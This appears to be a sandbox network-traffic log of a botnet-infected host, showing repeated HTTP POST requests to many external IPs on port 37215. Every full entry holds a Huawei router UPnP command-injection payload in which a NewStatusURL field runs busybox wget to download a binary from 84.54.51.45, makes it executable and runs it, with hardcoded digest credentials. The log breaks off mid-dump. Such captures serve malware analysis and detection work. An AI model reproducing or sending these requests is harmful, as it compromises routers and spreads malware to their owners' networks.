                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            625192.168.2.154643641.216.238.17337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160238028 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            626192.168.2.154964241.83.195.15137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160247087 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            627192.168.2.154370441.48.149.4037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160247087 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            628192.168.2.153639841.183.140.11737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160298109 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            629192.168.2.153467241.205.202.5837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160298109 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            630192.168.2.154238241.78.209.3437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160300016 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            631192.168.2.155024441.170.47.25337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160337925 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            632192.168.2.154984641.44.35.2337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160342932 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            633192.168.2.154808041.191.37.22237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160342932 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            634192.168.2.154841641.222.170.22937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160381079 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 